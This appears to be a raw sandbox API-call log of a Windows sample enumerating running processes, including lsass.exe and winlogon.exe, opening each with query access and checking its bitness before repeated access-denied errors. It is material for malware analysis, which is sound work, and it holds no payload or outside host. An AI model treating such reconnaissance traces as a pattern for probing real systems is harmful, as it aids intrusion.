	[0073.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0073.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0073.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0073.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0073.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0073.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dc00, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0073.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0073.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0073.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0073.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0073.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0073.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0073.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0073.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0073.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0073.829] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.829] CloseHandle (hObject=0x224) returned 1
	[0073.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7721b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0073.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0073.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0073.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0073.829] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.829] CloseHandle (hObject=0x224) returned 1
	[0073.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7287f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0073.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0073.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0073.830] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.830] CloseHandle (hObject=0x224) returned 1
	[0073.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0073.830] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.830] CloseHandle (hObject=0x224) returned 1
	[0073.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0073.830] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.830] CloseHandle (hObject=0x224) returned 1
	[0073.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0073.830] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.830] CloseHandle (hObject=0x224) returned 1
	[0073.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728958, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0073.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0073.831] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.831] CloseHandle (hObject=0x224) returned 1
	[0073.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0073.831] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.831] CloseHandle (hObject=0x224) returned 1
	[0073.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0073.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0073.831] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.831] CloseHandle (hObject=0x224) returned 1
	[0073.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0073.831] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.831] CloseHandle (hObject=0x224) returned 1
	[0073.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0073.832] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.832] CloseHandle (hObject=0x224) returned 1
	[0073.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728858, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0073.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0073.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0073.832] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.832] CloseHandle (hObject=0x224) returned 1
	[0073.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728838, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0073.832] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.832] CloseHandle (hObject=0x224) returned 1
	[0073.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc60, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0073.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0073.832] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.832] CloseHandle (hObject=0x224) returned 1
	[0073.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728a18, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0073.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0073.833] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.833] CloseHandle (hObject=0x224) returned 1
	[0073.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72ea68, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0073.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0073.833] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.833] CloseHandle (hObject=0x224) returned 1
	[0073.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0073.833] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.833] CloseHandle (hObject=0x224) returned 1
	[0073.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0073.833] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.833] CloseHandle (hObject=0x224) returned 1
	[0073.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0073.833] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.833] CloseHandle (hObject=0x224) returned 1
	[0073.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728958, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0073.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0073.834] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.834] CloseHandle (hObject=0x224) returned 1
	[0073.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728818, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0073.834] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.834] CloseHandle (hObject=0x224) returned 1
	[0073.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0073.834] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.834] CloseHandle (hObject=0x224) returned 1
	[0073.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0073.834] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.834] CloseHandle (hObject=0x224) returned 1
	[0073.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e810, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0073.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0073.834] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.834] CloseHandle (hObject=0x224) returned 1
	[0073.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x7721b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0073.835] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.835] CloseHandle (hObject=0x224) returned 1
	[0073.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0073.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0073.835] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.835] CloseHandle (hObject=0x224) returned 1
	[0073.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0073.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0073.835] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.835] CloseHandle (hObject=0x224) returned 1
	[0073.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0073.835] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.835] CloseHandle (hObject=0x224) returned 1
	[0073.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728a58, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0073.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0073.835] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.835] CloseHandle (hObject=0x224) returned 1
	[0073.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e888, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0073.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0073.836] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.836] CloseHandle (hObject=0x224) returned 1
	[0073.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72ea18, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0073.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0073.836] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.836] CloseHandle (hObject=0x224) returned 1
	[0073.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0073.836] GetLastError () returned 0x5
	[0073.836] GetLastError () returned 0x5
	[0073.836] GetLastError () returned 0x5
	[0073.836] GetLastError () returned 0x5
	[0073.836] GetLastError () returned 0x5
	[0073.836] GetLastError () returned 0x5
	[0073.836] GetLastError () returned 0x5
	[0073.836] GetLastError () returned 0x5
	[0073.836] GetLastError () returned 0x5
	[0073.836] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
	[0073.837] GetLastError () returned 0x5
